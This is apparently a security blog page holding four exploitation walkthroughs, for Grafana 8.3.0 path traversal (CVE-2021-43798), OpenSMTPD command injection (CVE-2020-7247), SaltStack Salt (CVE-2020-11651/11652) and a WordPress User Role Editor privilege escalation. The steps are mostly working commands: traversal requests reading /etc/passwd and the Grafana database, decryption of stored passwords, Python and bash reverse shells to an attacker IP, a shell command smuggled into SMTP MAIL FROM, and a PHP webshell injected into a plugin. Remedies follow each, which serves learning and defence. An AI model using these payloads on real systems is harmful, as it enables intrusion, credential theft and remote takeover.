Grafana 8.3.0 – Directory Traversal and Arbitrary File Read – CVE-2021-43798

by Vry4n_ | Jul 9, 2022 | Linux Exploitation

Grafana is an open-source platform for monitoring and observability. Grafana versions 8.0.0-beta1 through 8.3.0 (except for patched versions) iss vulnerable to directory traversal, allowing access to local files. The vulnerable URL path is: `<grafana_host_url>/public/plugins//`, where is the plugin ID for any installed plugin. At no time has Grafana Cloud been vulnerable. Users are advised to upgrade to patched versions 8.0.7, 8.1.8, 8.2.7, or 8.3.1.

Every Grafana instance comes with pre-installed plugins like the Prometheus plugin or MySQL plugin so the following URLs are vulnerable for every instance:

• <grafana_host_url>/public/plugins/alertlist/
• <grafana_host_url>/public/plugins/annolist/
• <grafana_host_url>/public/plugins/barchart/
• <grafana_host_url>/public/plugins/bargauge/
• <grafana_host_url>/public/plugins/candlestick/
• <grafana_host_url>/public/plugins/cloudwatch/
• <grafana_host_url>/public/plugins/dashlist/
• <grafana_host_url>/public/plugins/elasticsearch/
• <grafana_host_url>/public/plugins/gauge/
• <grafana_host_url>/public/plugins/geomap/
• <grafana_host_url>/public/plugins/gettingstarted/
• <grafana_host_url>/public/plugins/grafana-azure-monitor-datasource/
• <grafana_host_url>/public/plugins/graph/
• <grafana_host_url>/public/plugins/heatmap/
• <grafana_host_url>/public/plugins/histogram/
• <grafana_host_url>/public/plugins/influxdb/
• <grafana_host_url>/public/plugins/jaeger/
• <grafana_host_url>/public/plugins/logs/
• <grafana_host_url>/public/plugins/loki/
• <grafana_host_url>/public/plugins/mssql/
• <grafana_host_url>/public/plugins/mysql/
• <grafana_host_url>/public/plugins/news/
• <grafana_host_url>/public/plugins/nodeGraph/
• <grafana_host_url>/public/plugins/opentsdb
• <grafana_host_url>/public/plugins/piechart/
• <grafana_host_url>/public/plugins/pluginlist/
• <grafana_host_url>/public/plugins/postgres/
• <grafana_host_url>/public/plugins/prometheus/
• <grafana_host_url>/public/plugins/stackdriver/
• <grafana_host_url>/public/plugins/stat/
• <grafana_host_url>/public/plugins/state-timeline/
• <grafana_host_url>/public/plugins/status-history/
• <grafana_host_url>/public/plugins/table/
• <grafana_host_url>/public/plugins/table-old/
• <grafana_host_url>/public/plugins/tempo/
• <grafana_host_url>/public/plugins/testdata/
• <grafana_host_url>/public/plugins/text/
• <grafana_host_url>/public/plugins/timeseries/
• <grafana_host_url>/public/plugins/welcome/
• <grafana_host_url>/public/plugins/zipkin/

Affected Products

• All installations between v8.0.0-beta1 and v8.3.0 should be upgraded as soon as possible.
• Grafana Grafana 8.0.0
• Grafana Grafana 8.3.0

Enumeration

1. We can reach the log in screen and find out about the Grafana version, in our case this is using port 3000 (Version v8.3.0 (914fcedb72))

• http://192.168.227.181:3000/login

2. Using curl we can also query the /login page

• curl http://192.168.227.181:3000/login | grep “Grafana v”

Exploit (Script)

1. Having identified the version of the application, we can confirm if this application is vulnerable, we will use an automated exploit (https://www.exploit-db.com/exploits/50581) , I will download it using searchsploit

• searchsploit grafana
• searchsploit -m multiple/webapps/50581.py

2. Now, we can try to use the script to read files

• python 50581.py -H http://192.168.227.181:3000
• /etc/passwd

3. We can try all the known readable config files to find interesting information. At this point we will try to find Grafana config files, based on their documentation (https://github.com/grafana/grafana/blob/main/conf/defaults.ini) , /etc/grafana/grafana.ini seems to be interesting, since it can hold user/password info under Security section

• python 50581.py -H http://192.168.227.181:3000
• /etc/grafana/grafana.ini

Exploit (Manual)

1. We can use curl to read files

• curl –path-as-is http://192.168.227.181:3000/public/plugins/alertlist/../../../../../../../../etc/passwd

2. We can try to read a database file and store it in our PC, this is grafana database

• curl –path-as-is http://192.168.227.181:3000/public/plugins/alertlist/../../../../../../../../var/lib/grafana/grafana.db -o grafana.db
• ls -l grafana.db

3. Now we can use sqlite3 to read this database file, there is a data_source table that holds user information

• sqlite3 grafana.db
• .tables
• select * from data_source;

Note: Data sources store passwords and basic auth passwords in secureJsonData encrypted (AES-256 in CFB mode) by default.

4. Having the Password & Username, we can proceed to decrypt it

• basicAuthPassword”:”anBneWFNQ2z+IDGhz3a7wxaqjimuglSXTeMvhbvsveZwVzreNJSw+hsV4w==
• sysadmin

Decrypt the password using a script

1. We can now decrypt the password using a script found on the internet (https://github.com/jas502n/Grafana-CVE-2021-43798)

• git clone https://github.com/jas502n/Grafana-CVE-2021-43798.git
• cd Grafana-CVE-2021-43798
• ls

2. Try to run the script, if you run into errors, it might indicate you need to install dependencies

• go run AESDecrypt.go
• go env -w GO111MODULE=off
• go run AESDecrypt.go

3. As we got the error (cannot find package “golang.org/x/crypto/pbkdf2” in any of), we will try to install pbkdf2

• go get golang.org/x/crypto/pbkdf2

4. Now try to run the application

• go run AESDecrypt.go

5. Since the script includes variables with default values we need to change those to match our credentials:

• secret_key (found in /etc/grafana/grafana.ini) = SW2YcwTIb9zpOOhoPsMm
• dataSourcePassword (found in /var/lib/grafana/grafana.db) = anBneWFNQ2z+IDGhz3a7wxaqjimuglSXTeMvhbvsveZwVzreNJSw+hsV4w==

6. Edit the script

• vi AESDecrypt.go

7. Run the script again, the results should be the decrypted password

• go run AESDecrypt.go

8. (EXTRA) The result is SuperSecureP@ssw0rd, we can try using this password and the user (found in /var/lib/grafana/grafana.db) to SSH this host

• ssh sysadmin@192.168.171.181

(EXTRA) Interesting folder/file for LFI

• /conf/defaults.ini
• /etc/grafana/grafana.ini
• /etc/passwd
• /etc/shadow
• /home/grafana/.bash_history
• /home/grafana/.ssh/id_rsa
• /root/.bash_history
• /root/.ssh/id_rsa
• /usr/local/etc/grafana/grafana.ini
• /var/lib/grafana/grafana.db
• /proc/net/fib_trie
• /proc/net/tcp
• /proc/self/cmdline

these are directories, FUZZING them can help discover plugins)

• /usr/share/grafana/public/app/plugins/datasource
• /usr/share/grafana/public/app/plugins/

(EXTRA) Different ways to exploit LFI

• /public/plugins/alertGroups/../../../../../../../../etc/passwd
• /public/plugins/alertlist/../../../../../../../../etc/passwd
• /public/plugins/alertmanager/../../../../../../../../etc/passwd
• /public/plugins/annolist/../../../../../../../../etc/passwd
• /public/plugins/barchart/../../../../../../../../etc/passwd
• /public/plugins/bargauge/../../../../../../../../etc/passwd
• /public/plugins/canvas/../../../../../../../../etc/passwd
• /public/plugins/cloudwatch/../../../../../../../../etc/passwd
• /public/plugins/dashboard/../../../../../../../../etc/passwd
• /public/plugins/dashlist/../../../../../../../../etc/passwd
• /public/plugins/debug/../../../../../../../../etc/passwd
• /public/plugins/elasticsearch/../../../../../../../../etc/passwd
• /public/plugins/gauge/../../../../../../../../etc/passwd
• /public/plugins/geomap/../../../../../../../../etc/passwd
• /public/plugins/gettingstarted/../../../../../../../../etc/passwd
• /public/plugins/grafana-azure-monitor-datasource/../../../../../../../../etc/passwd
• /public/plugins/grafana/../../../../../../../../etc/passwd
• /public/plugins/graph/../../../../../../../../etc/passwd
• /public/plugins/graphite/../../../../../../../../etc/passwd
• /public/plugins/heatmap/../../../../../../../../etc/passwd
• /public/plugins/histogram/../../../../../../../../etc/passwd
• /public/plugins/influxdb/../../../../../../../../etc/passwd
• /public/plugins/jaeger/../../../../../../../../etc/passwd
• /public/plugins/live/../../../../../../../../etc/passwd
• /public/plugins/logs/../../../../../../../../etc/passwd
• /public/plugins/loki/../../../../../../../../etc/passwd
• /public/plugins/mixed/../../../../../../../../etc/passwd
• /public/plugins/mssql/../../../../../../../../etc/passwd
• /public/plugins/mysql/../../../../../../../../etc/passwd
• /public/plugins/news/../../../../../../../../etc/passwd
• /public/plugins/nodeGraph/../../../../../../../../etc/passwd
• /public/plugins/opentsdb/../../../../../../../../etc/passwd
• /public/plugins/piechart/../../../../../../../../etc/passwd
• /public/plugins/pluginlist/../../../../../../../../etc/passwd
• /public/plugins/postgres/../../../../../../../../etc/passwd
• /public/plugins/prometheus/../../../../../../../../etc/passwd
• /public/plugins/stat/../../../../../../../../etc/passwd
• /public/plugins/state-timeline/../../../../../../../../etc/passwd
• /public/plugins/status-history/../../../../../../../../etc/passwd
• /public/plugins/table-old/../../../../../../../../etc/passwd
• /public/plugins/table/../../../../../../../../etc/passwd
• /public/plugins/tempo/../../../../../../../../etc/passwd
• /public/plugins/testdata/../../../../../../../../etc/passwd
• /public/plugins/text/../../../../../../../../etc/passwd
• /public/plugins/timeseries/../../../../../../../../etc/passwd
• /public/plugins/welcome/../../../../../../../../etc/passwd
• /public/plugins/xychart/../../../../../../../../etc/passwd
• /public/plugins/zipkin/../../../../../../../../etc/passwd

Remedy

Upgrade to the latest version of Grafana (8.0.7, 8.1.8, 8.2.7, 8.3.1 or later). If you cannot upgrade, running a reverse proxy in front of Grafana that normalizes the PATH of the request will mitigate the vulnerability.

Resources

https://github.com/grafana/grafana/security/advisories/GHSA-8pjx-jj86-j47p

https://packetstormsecurity.com/files/165221

https://exchange.xforce.ibmcloud.com/vulnerabilities/214666

https://www.exploit-db.com/exploits/50581

https://grafana.com/blog/2021/12/07/grafana-8.3.1-8.2.7-8.1.8-and-8.0.7-released-with-high-severity-security-fix/

OpenSMTPD < 6.6.1 - Remote Code Execution (smtp_mailaddr) - CVE-2020-7247

by Vry4n_ | May 24, 2022 | Linux Exploitation

OpenSMTPD could allow a remote attacker to gain elevated privileges on the system, caused by improper handling of user input. By sending a specially-crafted mail request, an attacker could exploit this vulnerability to execute arbitrary code on the system as root.

smtp_mailaddr in smtp_session.c in OpenSMTPD 6.6, as used in OpenBSD 6.6 and other products, allows remote attackers to execute arbitrary commands as root via a crafted SMTP session, as demonstrated by shell metacharacters in a MAIL FROM field. This affects the “uncommented” default configuration. The issue exists because of an incorrect return value upon failure of input validation.

Affected Products

• OpenSMTPD OpenSMTPD 6.4.0
• OpenSMTPD OpenSMTPD 6.4.1
• OpenSMTPD OpenSMTPD 6.4.2
• OpenSMTPD OpenSMTPD 6.6.0
• OpenSMTPD OpenSMTPD 6.6.1

Identify

1. Running a vulnerability scanner against the remote vulnerable server, in this case we are using Nessus

2. We can also Identify this vulnerability using Nmap, in this case the smtp version is 2.0.0

• nmap -p 25 –script smtp-commands 192.168.161.71

Exploitation Script

1. Knowing the service version, we can try to exploit this service, using an automated exploit (https://www.exploit-db.com/exploits/47984)

• searchsploit smtpd
• searchsploit -m linux/remote/47984.py

2. This exploit will allow us to execute remote code, first make sure it is executable, otherwise, assign execute permissions

• ls -l 47984.py
• (OPTIONAL) chmod 777 47984.py

3. Since, we are allowed to run commands we will first Ping test back to our machine. So first start a TCPdump listener waiting for ICMP traffic

• sudo tcpdump -i tun0 icmp and src 192.168.161.71

4. Now, execute the exploit, and point the ping command to our local machine

• python 47984.py 192.168.161.71 25 ‘ping -c 4 192.168.49.161’

5. Check the capture, and, confirm it captured ICMP traffic

6. We should proceed with trying to access the server, I’ll try a reverse shell to port 80, because, after testing this server didn’t allow any other port

• nc -lvp 80

7. Run the exploit with the reverse shell query, I’ll use python

• python 47984.py 192.168.161.71 25 ‘python -c “import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\”192.168.49.161\”,80));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn(\”/bin/bash\”)”‘

7. Now, check the listener, we should have a new session

• whoami

Exploitation Manual

1. In order to exploit manually, we need to connect to the STMP service using telnet

• telnet 192.168.161.71 25

2. Since we will do a ping test we will start a capture on our local machine

• sudo tcpdump -i tun0 icmp and src 192.168.161.71

3. In the SMTP session run the following commands (note the return code should be 250)

• HELO x
• MAIL FROM:<;ping -c 4 192.168.49.161;>
• RCPT TO:<root>
• DATA
• <enter>
• vry4n
• .
• QUIT

4. Look at the capture, we should now see some output

5. Instead of the ping command, you can run any other commands like a reverse shell, or create new users, as this is run as root

Remedy

Upgrade to the latest version of OpenSMTPD (6.6.2 or later)

Resources

https://exchange.xforce.ibmcloud.com/vulnerabilities/175213

https://seclists.org/bugtraq/2020/Jan/40

https://packetstormsecurity.com/files/156137

https://nvd.nist.gov/vuln/detail/CVE-2020-7247

SaltStack Salt REST API Arbitrary Command Execution (CVE-2020-11651, CVE-2020-11652)

by Vry4n_ | Mar 30, 2022 | Linux Exploitation

The Salt system is a Python-based, open-source remote execution framework for configuration management, automation, provisioning, and orchestration.

Running commands on remote systems is the core function of Salt. Salt can execute multiple commands across thousands of systems in seconds with a single execution.

https://saltproject.io/

https://docs.saltproject.io/salt/user-guide/en/latest/topics/overview.html

https://docs.saltproject.io/en/latest/topics/about_salt_project.html#about-salt

CVE-2020-11651

An issue was discovered in SaltStack Salt before 2019.2.4 and 3000 before 3000.2. The salt-master process ClearFuncs class does not properly validate method calls. This allows a remote user to access some methods without authentication. These methods can be used to retrieve user tokens from the salt master and/or run arbitrary commands on salt minions.

CVE-2020-11652

An issue was discovered in SaltStack Salt before 2019.2.4 and 3000 before 3000.2. The salt-master process ClearFuncs class allows access to some methods that improperly sanitize paths. These methods allow arbitrary directory access to authenticated users.

Affected Products

• SaltStack Salt 2019.2.3
• SaltStack Salt 3000.1
• Cisco Modeling Labs Corporate Edition (CML)
• Cisco TelePresence IX5000 Series
• Cisco Virtual Internet Routing Lab Personal Edition (VIRL-PE)

Enumeration

1. This vulnerability is present before the version 3000.1. We will enumerate this service, first I noticed an API site exposed

• http://192.168.71.62:8000/

2. In order to examine the version I ran I curl command and sent a HTTP request, to check upon the response header. I noticed “X-Upstream: salt-api/3000-1”

• curl -v http://192.168.71.62:8000/

Exploitation

1. Knowing this API is SaltStack we can proceed to look for exploits, I found this one that worked really well

• https://github.com/jasperla/CVE-2020-11651-poc

2. We will proceed to download the exploit, and install the required libraries (salt)

• git clone https://github.com/jasperla/CVE-2020-11651-poc.git
• sudo pip3 install salt
• cd CVE-2020-11651-poc
• ls

3. now we proceed to execute the exploit.py file, we will execute the help toption

• python3 exploit.py -h

4. Now we will proceed, to execute the program as a test. If we get the “root key” it means it is working without issues

• python3 exploit.py –master 192.168.71.62

5. Now I will run a test command, I’ll run a ping command and capture it with TCPDump (this will only execute in the master, if you need to execute into all the minion server use –exec-all)

Packet Capture

• sudo tcpdump -i tun0

Command execution

• python3 exploit.py –master 192.168.71.62 –exec “ping -c 4 192.168.49.71”

Output in packet capture

6. At this point we know that we can execute commands and we have connectivity back to our local machine. Now I will start a listener, and, execute a bash reverse shell

Listener

• nc -lvp 4505

Reverse Shell

• python3 exploit.py –master 192.168.71.62 –exec “bash -i >& /dev/tcp/192.168.49.71/4505 0>&1”

Final result, (reverse shell)

• whoami && date && hostname

Optional

1. We can upload files, and, read them to verify

• echo “Vry4n was here” > sample.txt
• python3 exploit.py –master 192.168.71.62 –upload-src sample.txt –upload-dest ../../../../../../../../tmp/sample.txt
• python3 exploit.py –master 192.168.71.62 -r “/tmp/sample.txt”

2. We can also read files using (-r)

• python3 exploit.py –master 192.168.71.62 -r “/etc/passwd”

Remedy

Upgrade to the latest version of Salt (2019.2.4, 3000.2 or later), available from the SALTSTACK Web site.

Resources

https://exchange.xforce.ibmcloud.com/vulnerabilities/181316

https://exchange.xforce.ibmcloud.com/vulnerabilities/181317

https://github.com/saltstack/salt/blob/v3000.2_docs/doc/topics/releases/3000.2.rst

https://www.exploit-db.com/exploits/48421

https://docs.saltproject.io/en/latest/topics/releases/2019.2.4.html

https://packetstormsecurity.com/files/157560

https://github.com/dozernz/cve-2020-11651

https://github.com/jasperla/CVE-2020-11651-poc

https://github.com/rossengeorgiev/salt-security-backports

WordPress Plugin User Role Editor < 4.24 - Privilege Escalation

by Vry4n_ | Mar 1, 2021 | Linux Exploitation

WordPress Plugin User Role Editor is prone to a security bypass vulnerability. Exploiting this issue may allow attackers to perform otherwise restricted actions by gaining administrator access. WordPress Plugin User Role Editor version 4.24 is vulnerable; prior versions may also be affected.

The WordPress User Role Editor plugin prior to v4.25, is lacking an authorization check within its update user profile functionality (“update” function, contained within the “class-user-other-roles.php” module). Instead of verifying whether the current user has the right to edit other users’ profiles (“edit_users” WP capability), the vulnerable function verifies whether the current user has the rights to edit the user (“edit_user” WP function) specified by the supplied user id (“user_id” variable/HTTP POST parameter). Since the supplied user id is the current user’s id, this check is always bypassed (i.e. the current user is always allowed to modify its profile).

This vulnerability allows an authenticated user to add arbitrary User Role Editor roles to its profile, by specifying them via the “ure_other_roles” parameter within the HTTP POST request to the “profile.php” module (issued when “Update Profile” is clicked).

By default, this module grants the specified WP user all administrative privileges, existing within the context of the User Role Editor plugin.

Exploit

1. In the main menu go to

• Users – Your Profile

2. Capture web traffic using a proxy, I’d use BurpSuite, and then, click on Update Profile

3. Add &ure_other_roles=administrator to the end of the POST data, and then forward the request and follow the redirects.

• &ure_other_roles=administrator

4. When the page reloads in your browser, we should have a lot more options available to us in the menu. And our user showing administrator rights. Before it only had “Help Desk”

5. Administrator users can then modify PHP code on the site (through themes or plugins) and insert a reverse shell connection payload.

6. Start a netcat listener in the attacking machine

• nc -lvp 5555

7. Now in WordPress having the administrator rights go to

• Plugins – Plugin editor

8. Inject PHP code to any of the plugins’ code. Id modify “Hello Dolly”. I will use the webshell that comes with kali, just edit the remote address and the port

• /usr/share/webshells/php/ php-reverse-shell.php

9. Now execute that code by visiting the hello.php script in /wp-content/plugins/hello.php

• http://wordy/wp-content/plugins/hello.php

10. Check listener you should get a connection back.

• whoami; hostname; date

Remediation

Update to plugin version 4.25 or latest